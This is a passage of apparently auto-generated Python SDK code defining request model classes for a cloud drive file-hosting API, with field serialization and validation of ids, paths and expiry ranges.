        """Serialize the set (non-None) fields; map keys equal attribute names."""
        pairs = (
            ('addition_data', self.addition_data),
            ('drive_id', self.drive_id),
            ('expire_sec', self.expire_sec),
            ('file_id', self.file_id),
            ('file_id_path', self.file_id_path),
            ('file_name', self.file_name),
            ('location', self.location),
            ('referer', self.referer),
            ('share_id', self.share_id),
            ('sign_token', self.sign_token),
        )
        return {key: value for key, value in pairs if value is not None}
    def from_map(self, m: dict = None):
        """Populate from a plain dict, skipping absent/None keys; returns self."""
        m = m or dict()
        for key in ('addition_data', 'drive_id', 'expire_sec', 'file_id',
                    'file_id_path', 'file_name', 'location', 'referer',
                    'share_id', 'sign_token'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class GetDriveRequest(TeaModel):
    """
    Get drive request
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        drive_id: str = None,
    ):
        self.headers = headers
        # drive ID (required)
        self.drive_id = drive_id
    def validate(self):
        """drive_id must be supplied."""
        self.validate_required(self.drive_id, 'drive_id')
    def to_map(self):
        """Serialize the set (non-None) fields into a plain dict."""
        pairs = (('headers', self.headers), ('drive_id', self.drive_id))
        return {key: value for key, value in pairs if value is not None}
    def from_map(self, m: dict = None):
        """Populate from a plain dict, skipping absent/None keys; returns self."""
        m = m or dict()
        for key in ('headers', 'drive_id'):
            value = m.get(key)
            if value is not None:
                setattr(self, key, value)
        return self
class GetFileByPathRequest(TeaModel):
    """
    Get file by path request body (根据路径获取 File 接口 body).
    """
    def __init__(
        self,
        addition_data: dict = None,
        drive_id: str = None,
        file_path: str = None,
        image_cropping_aspect_ratios: List[str] = None,
        image_thumbnail_process: str = None,
        image_url_process: str = None,
        referer: str = None,
        sign_token: str = None,
        url_expire_sec: int = None,
        video_thumbnail_process: str = None,
    ):
        # addition_data
        self.addition_data = addition_data
        # drive_id (numeric string, required)
        self.drive_id = drive_id
        # file_path
        self.file_path = file_path
        self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
        # image_thumbnail_process
        self.image_thumbnail_process = image_thumbnail_process
        # image_url_process
        self.image_url_process = image_url_process
        self.referer = referer
        self.sign_token = sign_token
        # url_expire_sec (10 .. 14400, see validate())
        self.url_expire_sec = url_expire_sec
        # video_thumbnail_process (type: string)
        # NOTE(review): removed a stray `type:string` annotation statement
        # left by the generator (a runtime no-op inside a function body).
        self.video_thumbnail_process = video_thumbnail_process
    def validate(self):
        """Check required drive_id, its pattern, and the url_expire_sec range."""
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.url_expire_sec is not None:
            self.validate_maximum(self.url_expire_sec, 'url_expire_sec', 14400)
            self.validate_minimum(self.url_expire_sec, 'url_expire_sec', 10)
    def to_map(self):
        """Serialize the set (non-None) fields into a plain dict."""
        result = dict()
        if self.addition_data is not None:
            result['addition_data'] = self.addition_data
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.file_path is not None:
            result['file_path'] = self.file_path
        if self.image_cropping_aspect_ratios is not None:
            result['image_cropping_aspect_ratios'] = self.image_cropping_aspect_ratios
        if self.image_thumbnail_process is not None:
            result['image_thumbnail_process'] = self.image_thumbnail_process
        if self.image_url_process is not None:
            result['image_url_process'] = self.image_url_process
        if self.referer is not None:
            result['referer'] = self.referer
        if self.sign_token is not None:
            result['sign_token'] = self.sign_token
        if self.url_expire_sec is not None:
            result['url_expire_sec'] = self.url_expire_sec
        if self.video_thumbnail_process is not None:
            result['video_thumbnail_process'] = self.video_thumbnail_process
        return result
    def from_map(self, m: dict = None):
        """Populate from a plain dict, skipping absent/None keys; returns self."""
        m = m or dict()
        if m.get('addition_data') is not None:
            self.addition_data = m.get('addition_data')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('file_path') is not None:
            self.file_path = m.get('file_path')
        if m.get('image_cropping_aspect_ratios') is not None:
            self.image_cropping_aspect_ratios = m.get('image_cropping_aspect_ratios')
        if m.get('image_thumbnail_process') is not None:
            self.image_thumbnail_process = m.get('image_thumbnail_process')
        if m.get('image_url_process') is not None:
            self.image_url_process = m.get('image_url_process')
        if m.get('referer') is not None:
            self.referer = m.get('referer')
        if m.get('sign_token') is not None:
            self.sign_token = m.get('sign_token')
        if m.get('url_expire_sec') is not None:
            self.url_expire_sec = m.get('url_expire_sec')
        if m.get('video_thumbnail_process') is not None:
            self.video_thumbnail_process = m.get('video_thumbnail_process')
        return self
class GetFileRequest(TeaModel):
    """
    Get file metadata request.
    """
    def __init__(
        self,
        addition_data: dict = None,
        drive_id: str = None,
        fields: str = None,
        file_id: str = None,
        file_id_path: str = None,
        image_cropping_aspect_ratios: List[str] = None,
        image_thumbnail_process: str = None,
        image_url_process: str = None,
        location: str = None,
        referer: str = None,
        share_id: str = None,
        sign_token: str = None,
        url_expire_sec: int = None,
        video_thumbnail_process: str = None,
    ):
        # addition_data
        self.addition_data = addition_data
        # drive_id
        self.drive_id = drive_id
        # fields
        self.fields = fields
        # file_id
        self.file_id = file_id
        self.file_id_path = file_id_path
        self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
        # image_thumbnail_process
        self.image_thumbnail_process = image_thumbnail_process
        # image_url_process
        self.image_url_process = image_url_process
        # location
        self.location = location
        self.referer = referer
        # share_id, either share_id or drive_id is required
        self.share_id = share_id
        self.sign_token = sign_token
        # url_expire_sec
        self.url_expire_sec = url_expire_sec
        # video_thumbnail_process
        # type: string  (fix: was a bare `type:string` annotation statement left by the generator)
        self.video_thumbnail_process = video_thumbnail_process
    def validate(self):
        # NOTE(review): drive_id is validated as required even though the
        # share_id comment says either one suffices — kept as generated;
        # confirm against the service contract.
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_id, 'file_id')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
        if self.url_expire_sec is not None:
            self.validate_maximum(self.url_expire_sec, 'url_expire_sec', 14400)
            self.validate_minimum(self.url_expire_sec, 'url_expire_sec', 10)
    def to_map(self):
        # Serialize all non-None fields into a plain dict.
        result = dict()
        if self.addition_data is not None:
            result['addition_data'] = self.addition_data
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.fields is not None:
            result['fields'] = self.fields
        if self.file_id is not None:
            result['file_id'] = self.file_id
        if self.file_id_path is not None:
            result['file_id_path'] = self.file_id_path
        if self.image_cropping_aspect_ratios is not None:
            result['image_cropping_aspect_ratios'] = self.image_cropping_aspect_ratios
        if self.image_thumbnail_process is not None:
            result['image_thumbnail_process'] = self.image_thumbnail_process
        if self.image_url_process is not None:
            result['image_url_process'] = self.image_url_process
        if self.location is not None:
            result['location'] = self.location
        if self.referer is not None:
            result['referer'] = self.referer
        if self.share_id is not None:
            result['share_id'] = self.share_id
        if self.sign_token is not None:
            result['sign_token'] = self.sign_token
        if self.url_expire_sec is not None:
            result['url_expire_sec'] = self.url_expire_sec
        if self.video_thumbnail_process is not None:
            result['video_thumbnail_process'] = self.video_thumbnail_process
        return result
    def from_map(self, m: dict = None):
        # Populate fields from dict *m*, skipping absent/None keys; returns self.
        m = m or dict()
        if m.get('addition_data') is not None:
            self.addition_data = m.get('addition_data')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('fields') is not None:
            self.fields = m.get('fields')
        if m.get('file_id') is not None:
            self.file_id = m.get('file_id')
        if m.get('file_id_path') is not None:
            self.file_id_path = m.get('file_id_path')
        if m.get('image_cropping_aspect_ratios') is not None:
            self.image_cropping_aspect_ratios = m.get('image_cropping_aspect_ratios')
        if m.get('image_thumbnail_process') is not None:
            self.image_thumbnail_process = m.get('image_thumbnail_process')
        if m.get('image_url_process') is not None:
            self.image_url_process = m.get('image_url_process')
        if m.get('location') is not None:
            self.location = m.get('location')
        if m.get('referer') is not None:
            self.referer = m.get('referer')
        if m.get('share_id') is not None:
            self.share_id = m.get('share_id')
        if m.get('sign_token') is not None:
            self.sign_token = m.get('sign_token')
        if m.get('url_expire_sec') is not None:
            self.url_expire_sec = m.get('url_expire_sec')
        if m.get('video_thumbnail_process') is not None:
            self.video_thumbnail_process = m.get('video_thumbnail_process')
        return self
class GetLastCursorRequest(TeaModel):
    """
    Get latest cursor request.
    """
    def __init__(
        self,
        drive_id: str = None,
    ):
        # drive_id: the drive whose latest change cursor is requested
        self.drive_id = drive_id
    def validate(self):
        # drive_id is mandatory and must be a decimal string.
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
    def to_map(self):
        # Serialize non-None fields; attribute and wire key share the name.
        result = dict()
        for name in ('drive_id',):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result
    def from_map(self, m: dict = None):
        # Populate from *m*, skipping absent/None keys; returns self.
        m = m or dict()
        for name in ('drive_id',):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetMediaPlayURLRequest(TeaModel):
    """
    get_media_play_url request
    """
    def __init__(
        self,
        drive_id: str = None,
        file_id: str = None,
    ):
        # drive_id of the media file
        self.drive_id = drive_id
        # file_id of the media file
        self.file_id = file_id
    def validate(self):
        # Both ids are mandatory; drive_id is decimal, file_id is a short id.
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_id, 'file_id')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
    def to_map(self):
        # Serialize non-None fields; attribute and wire key share the name.
        result = dict()
        for name in ('drive_id', 'file_id'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result
    def from_map(self, m: dict = None):
        # Populate from *m*, skipping absent/None keys; returns self.
        m = m or dict()
        for name in ('drive_id', 'file_id'):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetOfficeEditUrlRequest(TeaModel):
    """
    Get office document online-edit URL request.
    """
    def __init__(
        self,
        addition_data: dict = None,
        drive_id: str = None,
        file_id: str = None,
    ):
        # addition_data
        self.addition_data = addition_data
        # drive_id
        self.drive_id = drive_id
        # file_id
        self.file_id = file_id
    def validate(self):
        # drive_id and file_id are mandatory and pattern-checked.
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_id, 'file_id')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
    def to_map(self):
        # Serialize non-None fields; attribute and wire key share the name.
        result = dict()
        for name in ('addition_data', 'drive_id', 'file_id'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result
    def from_map(self, m: dict = None):
        # Populate from *m*, skipping absent/None keys; returns self.
        m = m or dict()
        for name in ('addition_data', 'drive_id', 'file_id'):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetOfficePreviewUrlRequest(TeaModel):
    """
    Get office document preview URL request.
    """
    def __init__(
        self,
        addition_data: dict = None,
        drive_id: str = None,
        file_id: str = None,
        share_id: str = None,
    ):
        # addition_data
        self.addition_data = addition_data
        # drive_id
        self.drive_id = drive_id
        # file_id
        self.file_id = file_id
        # share_id, either share_id or drive_id is required
        self.share_id = share_id
    def validate(self):
        # drive_id and file_id are mandatory and pattern-checked.
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_id, 'file_id')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
    def to_map(self):
        # Serialize non-None fields; attribute and wire key share the name.
        result = dict()
        for name in ('addition_data', 'drive_id', 'file_id', 'share_id'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result
    def from_map(self, m: dict = None):
        # Populate from *m*, skipping absent/None keys; returns self.
        m = m or dict()
        for name in ('addition_data', 'drive_id', 'file_id', 'share_id'):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetShareLinkByAnonymousRequest(TeaModel):
    """
    get_share_link_by_anonymous request
    """
    def __init__(
        self,
        share_id: str = None,
    ):
        # share_id of the share link to look up anonymously
        self.share_id = share_id
    def validate(self):
        # No constraints on share_id beyond its presence being optional.
        pass
    def to_map(self):
        # Serialize non-None fields; attribute and wire key share the name.
        result = dict()
        for name in ('share_id',):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result
    def from_map(self, m: dict = None):
        # Populate from *m*, skipping absent/None keys; returns self.
        m = m or dict()
        for name in ('share_id',):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetShareLinkIDRequest(TeaModel):
    """
    get_share_id request
    """
    def __init__(
        self,
        share_msg: str = None,
    ):
        # share_msg: the share message to resolve into a share id
        self.share_msg = share_msg
    def validate(self):
        # No field constraints.
        pass
    def to_map(self):
        # Serialize non-None fields; attribute and wire key share the name.
        result = dict()
        for name in ('share_msg',):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result
    def from_map(self, m: dict = None):
        # Populate from *m*, skipping absent/None keys; returns self.
        m = m or dict()
        for name in ('share_msg',):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetShareLinkTokenRequest(TeaModel):
    """
    get_share_token request
    """
    def __init__(
        self,
        share_id: str = None,
        share_pwd: str = None,
    ):
        # share_id
        self.share_id = share_id
        # share_pwd
        self.share_pwd = share_pwd
    def validate(self):
        # No field constraints.
        pass
    def to_map(self):
        # Serialize non-None fields; attribute and wire key share the name.
        result = dict()
        for name in ('share_id', 'share_pwd'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result
    def from_map(self, m: dict = None):
        # Populate from *m*, skipping absent/None keys; returns self.
        m = m or dict()
        for name in ('share_id', 'share_pwd'):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetShareRequest(TeaModel):
    """
    get share request
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        share_id: str = None,
    ):
        # extra HTTP headers to send with the request
        self.headers = headers
        # share_id
        self.share_id = share_id
    def validate(self):
        # No field constraints.
        pass
    def to_map(self):
        # Serialize non-None fields; attribute and wire key share the name.
        result = dict()
        for name in ('headers', 'share_id'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result
    def from_map(self, m: dict = None):
        # Populate from *m*, skipping absent/None keys; returns self.
        m = m or dict()
        for name in ('headers', 'share_id'):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetUploadUrlRequest(TeaModel):
    """
    Get file upload URL request.
    """
    def __init__(
        self,
        content_md_5: str = None,
        drive_id: str = None,
        file_id: str = None,
        part_info_list: List[UploadPartInfo] = None,
        share_id: str = None,
        upload_id: str = None,
    ):
        # content_md5
        self.content_md_5 = content_md_5
        # drive_id
        self.drive_id = drive_id
        # file_id
        self.file_id = file_id
        # upload_part_list
        self.part_info_list = part_info_list
        self.share_id = share_id
        # upload_id
        self.upload_id = upload_id
    def validate(self):
        # content_md5 is capped at 32 chars; file_id and upload_id are
        # mandatory; each provided part descriptor validates itself.
        if self.content_md_5 is not None:
            self.validate_max_length(self.content_md_5, 'content_md_5', 32)
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_id, 'file_id')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
        if self.part_info_list:
            for part in self.part_info_list:
                if part:
                    part.validate()
        self.validate_required(self.upload_id, 'upload_id')
    def to_map(self):
        # Serialize non-None fields; content_md_5 maps to the 'content_md5'
        # wire key and part_info_list is always emitted (possibly empty).
        result = dict()
        if self.content_md_5 is not None:
            result['content_md5'] = self.content_md_5
        for name in ('drive_id', 'file_id'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        result['part_info_list'] = []
        if self.part_info_list is not None:
            result['part_info_list'] = [
                part.to_map() if part else None for part in self.part_info_list
            ]
        for name in ('share_id', 'upload_id'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result
    def from_map(self, m: dict = None):
        # Populate from *m*; part_info_list entries are rebuilt as
        # UploadPartInfo models. Returns self.
        m = m or dict()
        if m.get('content_md5') is not None:
            self.content_md_5 = m.get('content_md5')
        for name in ('drive_id', 'file_id'):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        self.part_info_list = []
        if m.get('part_info_list') is not None:
            self.part_info_list = [
                UploadPartInfo().from_map(part) for part in m.get('part_info_list')
            ]
        for name in ('share_id', 'upload_id'):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetVideoPreviewSpriteURLRequest(TeaModel):
    """
    Request body for getting the video sprite-sheet URL.
    """
    def __init__(
        self,
        drive_id: str = None,
        expire_sec: int = None,
        file_id: str = None,
        share_id: str = None,
    ):
        # drive_id
        self.drive_id = drive_id
        # expire_sec
        self.expire_sec = expire_sec
        # file_id
        self.file_id = file_id
        # share_id, either share_id or drive_id is required
        self.share_id = share_id
    def validate(self):
        # drive_id and file_id are mandatory; expire_sec must lie in [1, 14400].
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.expire_sec is not None:
            self.validate_maximum(self.expire_sec, 'expire_sec', 14400)
            self.validate_minimum(self.expire_sec, 'expire_sec', 1)
        self.validate_required(self.file_id, 'file_id')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
    def to_map(self):
        # Serialize non-None fields; attribute and wire key share the name.
        result = dict()
        for name in ('drive_id', 'expire_sec', 'file_id', 'share_id'):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result
    def from_map(self, m: dict = None):
        # Populate from *m*, skipping absent/None keys; returns self.
        m = m or dict()
        for name in ('drive_id', 'expire_sec', 'file_id', 'share_id'):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class GetVideoPreviewURLRequest(TeaModel):
    """
    Request body for getting a video file's play URL.
    """
    def __init__(
        self,
        addition_data: dict = None,
        audio_template_id: str = None,
        drive_id: str = None,
        expire_sec: int = None,
        file_id: str = None,
        share_id: str = None,
        template_id: str = None,
    ):
        # addition_data
        self.addition_data = addition_data
        # audio_template_id
        self.audio_template_id = audio_template_id
        # drive_id
        self.drive_id = drive_id
        # expire_sec
        self.expire_sec = expire_sec
        # file_id
        self.file_id = file_id
        # share_id, either share_id or drive_id is required
        self.share_id = share_id
        # template_id
        self.template_id = template_id
    def validate(self):
        # drive_id and file_id are mandatory; expire_sec must lie in [1, 14400].
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.expire_sec is not None:
            self.validate_maximum(self.expire_sec, 'expire_sec', 14400)
            self.validate_minimum(self.expire_sec, 'expire_sec', 1)
        self.validate_required(self.file_id, 'file_id')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
    def to_map(self):
        # Serialize non-None fields; attribute and wire key share the name.
        result = dict()
        for name in (
            'addition_data',
            'audio_template_id',
            'drive_id',
            'expire_sec',
            'file_id',
            'share_id',
            'template_id',
        ):
            value = getattr(self, name)
            if value is not None:
                result[name] = value
        return result
    def from_map(self, m: dict = None):
        # Populate from *m*, skipping absent/None keys; returns self.
        m = m or dict()
        for name in (
            'addition_data',
            'audio_template_id',
            'drive_id',
            'expire_sec',
            'file_id',
            'share_id',
            'template_id',
        ):
            value = m.get(name)
            if value is not None:
                setattr(self, name, value)
        return self
class HostingCompleteFileRequest(TeaModel):
    """
    complete file request
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        addition_data: dict = None,
        drive_id: str = None,
        file_path: str = None,
        forbid_overwrite: bool = None,
        part_info_list: List[UploadPartInfo] = None,
        share_id: str = None,
        upload_id: str = None,
    ):
        # extra HTTP headers to send with the request
        self.headers = headers
        # addition_data
        self.addition_data = addition_data
        # drive_id
        self.drive_id = drive_id
        self.file_path = file_path
        # forbid_overwrite
        # type: boolean  (fix: was a bare `type: boolean` annotation statement left by the generator)
        self.forbid_overwrite = forbid_overwrite
        # part_info_list
        self.part_info_list = part_info_list
        self.share_id = share_id
        # upload_id
        self.upload_id = upload_id
    def validate(self):
        # drive_id must be a decimal string; each provided part validates itself.
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.part_info_list:
            for k in self.part_info_list:
                if k:
                    k.validate()
    def to_map(self):
        # Serialize non-None fields; part_info_list is always emitted
        # (possibly empty) with each part serialized recursively.
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.addition_data is not None:
            result['addition_data'] = self.addition_data
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.file_path is not None:
            result['file_path'] = self.file_path
        if self.forbid_overwrite is not None:
            result['forbid_overwrite'] = self.forbid_overwrite
        result['part_info_list'] = []
        if self.part_info_list is not None:
            for k in self.part_info_list:
                result['part_info_list'].append(k.to_map() if k else None)
        if self.share_id is not None:
            result['share_id'] = self.share_id
        if self.upload_id is not None:
            result['upload_id'] = self.upload_id
        return result
    def from_map(self, m: dict = None):
        # Populate from *m*; part_info_list entries are rebuilt as
        # UploadPartInfo models. Returns self.
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('addition_data') is not None:
            self.addition_data = m.get('addition_data')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('file_path') is not None:
            self.file_path = m.get('file_path')
        if m.get('forbid_overwrite') is not None:
            self.forbid_overwrite = m.get('forbid_overwrite')
        self.part_info_list = []
        if m.get('part_info_list') is not None:
            for k in m.get('part_info_list'):
                temp_model = UploadPartInfo()
                self.part_info_list.append(temp_model.from_map(k))
        if m.get('share_id') is not None:
            self.share_id = m.get('share_id')
        if m.get('upload_id') is not None:
            self.upload_id = m.get('upload_id')
        return self
class HostingCopyFileRequest(TeaModel):
    """
    copy file request
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        drive_id: str = None,
        file_path: str = None,
        new_name: str = None,
        overwrite: bool = None,
        share_id: str = None,
        to_drive_id: str = None,
        to_parent_file_path: str = None,
        to_share_id: str = None,
    ):
        # extra HTTP headers to send with the request
        self.headers = headers
        # drive_id
        self.drive_id = drive_id
        # file_path
        self.file_path = file_path
        # new_name
        self.new_name = new_name
        # overwrite
        # type: boolean  (fix: was a bare `type: boolean` annotation statement left by the generator)
        self.overwrite = overwrite
        # share_id
        self.share_id = share_id
        # to_drive_id
        self.to_drive_id = to_drive_id
        # to_parent_file_path
        self.to_parent_file_path = to_parent_file_path
        # to_share_id  (fix: comment previously said "share_id")
        self.to_share_id = to_share_id
    def validate(self):
        # file_path and to_parent_file_path are mandatory; ids are pattern-checked.
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_path, 'file_path')
        if self.new_name is not None:
            self.validate_max_length(self.new_name, 'new_name', 1024)
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
        if self.to_drive_id is not None:
            self.validate_pattern(self.to_drive_id, 'to_drive_id', '[0-9]+')
        self.validate_required(self.to_parent_file_path, 'to_parent_file_path')
    def to_map(self):
        # Serialize all non-None fields into a plain dict.
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.file_path is not None:
            result['file_path'] = self.file_path
        if self.new_name is not None:
            result['new_name'] = self.new_name
        if self.overwrite is not None:
            result['overwrite'] = self.overwrite
        if self.share_id is not None:
            result['share_id'] = self.share_id
        if self.to_drive_id is not None:
            result['to_drive_id'] = self.to_drive_id
        if self.to_parent_file_path is not None:
            result['to_parent_file_path'] = self.to_parent_file_path
        if self.to_share_id is not None:
            result['to_share_id'] = self.to_share_id
        return result
    def from_map(self, m: dict = None):
        # Populate fields from dict *m*, skipping absent/None keys; returns self.
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('file_path') is not None:
            self.file_path = m.get('file_path')
        if m.get('new_name') is not None:
            self.new_name = m.get('new_name')
        if m.get('overwrite') is not None:
            self.overwrite = m.get('overwrite')
        if m.get('share_id') is not None:
            self.share_id = m.get('share_id')
        if m.get('to_drive_id') is not None:
            self.to_drive_id = m.get('to_drive_id')
        if m.get('to_parent_file_path') is not None:
            self.to_parent_file_path = m.get('to_parent_file_path')
        if m.get('to_share_id') is not None:
            self.to_share_id = m.get('to_share_id')
        return self
class HostingCreateFileRequest(TeaModel):
    """
    create file request
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        addition_data: dict = None,
        content_md_5: str = None,
        content_type: str = None,
        drive_id: str = None,
        forbid_overwrite: bool = None,
        name: str = None,
        parent_file_path: str = None,
        part_info_list: List[UploadPartInfo] = None,
        share_id: str = None,
        size: int = None,
        type: str = None,
    ):
        # extra HTTP headers to send with the request
        self.headers = headers
        # addition_data
        self.addition_data = addition_data
        # ContentMd5
        self.content_md_5 = content_md_5
        # ContentType
        self.content_type = content_type
        # drive_id
        self.drive_id = drive_id
        # forbid_overwrite
        # type: boolean  (fix: was a bare `type: boolean` annotation statement left by the generator)
        self.forbid_overwrite = forbid_overwrite
        # Name
        self.name = name
        # parent_file_path
        self.parent_file_path = parent_file_path
        # part_info_list
        self.part_info_list = part_info_list
        # share_id
        self.share_id = share_id
        # Size
        self.size = size
        # Type
        self.type = type
    def validate(self):
        # name, parent_file_path and type are mandatory; size is capped at
        # 50 GiB (53687091200 bytes); each provided part validates itself.
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.name, 'name')
        if self.name is not None:
            self.validate_max_length(self.name, 'name', 1024)
        self.validate_required(self.parent_file_path, 'parent_file_path')
        if self.part_info_list:
            for k in self.part_info_list:
                if k:
                    k.validate()
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
        if self.size is not None:
            self.validate_maximum(self.size, 'size', 53687091200)
            self.validate_minimum(self.size, 'size', 0)
        self.validate_required(self.type, 'type')
    def to_map(self):
        # Serialize non-None fields; content_md_5 maps to 'content_md5' and
        # part_info_list is always emitted (possibly empty).
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.addition_data is not None:
            result['addition_data'] = self.addition_data
        if self.content_md_5 is not None:
            result['content_md5'] = self.content_md_5
        if self.content_type is not None:
            result['content_type'] = self.content_type
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.forbid_overwrite is not None:
            result['forbid_overwrite'] = self.forbid_overwrite
        if self.name is not None:
            result['name'] = self.name
        if self.parent_file_path is not None:
            result['parent_file_path'] = self.parent_file_path
        result['part_info_list'] = []
        if self.part_info_list is not None:
            for k in self.part_info_list:
                result['part_info_list'].append(k.to_map() if k else None)
        if self.share_id is not None:
            result['share_id'] = self.share_id
        if self.size is not None:
            result['size'] = self.size
        if self.type is not None:
            result['type'] = self.type
        return result
    def from_map(self, m: dict = None):
        # Populate from *m*; part_info_list entries are rebuilt as
        # UploadPartInfo models. Returns self.
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('addition_data') is not None:
            self.addition_data = m.get('addition_data')
        if m.get('content_md5') is not None:
            self.content_md_5 = m.get('content_md5')
        if m.get('content_type') is not None:
            self.content_type = m.get('content_type')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('forbid_overwrite') is not None:
            self.forbid_overwrite = m.get('forbid_overwrite')
        if m.get('name') is not None:
            self.name = m.get('name')
        if m.get('parent_file_path') is not None:
            self.parent_file_path = m.get('parent_file_path')
        self.part_info_list = []
        if m.get('part_info_list') is not None:
            for k in m.get('part_info_list'):
                temp_model = UploadPartInfo()
                self.part_info_list.append(temp_model.from_map(k))
        if m.get('share_id') is not None:
            self.share_id = m.get('share_id')
        if m.get('size') is not None:
            self.size = m.get('size')
        if m.get('type') is not None:
            self.type = m.get('type')
        return self
class HostingDeleteFileRequest(TeaModel):
    """
    Delete file request.
    """
    def __init__(
        self,
        headers: Dict[str, str] = None,
        drive_id: str = None,
        file_path: str = None,
        permanently: bool = None,
        share_id: str = None,
    ):
        # extra HTTP headers to send with the request
        self.headers = headers
        # drive_id
        self.drive_id = drive_id
        # file_path
        self.file_path = file_path
        # permanently
        # type: boolean, generator note said "type: false" — likely the default
        # (fix: was a bare `type: false` annotation statement left by the generator)
        self.permanently = permanently
        # share_id
        self.share_id = share_id
    def validate(self):
        # file_path is mandatory (max 1000 chars); ids are pattern-checked.
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_path, 'file_path')
        if self.file_path is not None:
            self.validate_max_length(self.file_path, 'file_path', 1000)
        if self.share_id is not None:
            self.validate_pattern(self.share_id, 'share_id', '[0-9a-zA-Z-]+')
    def to_map(self):
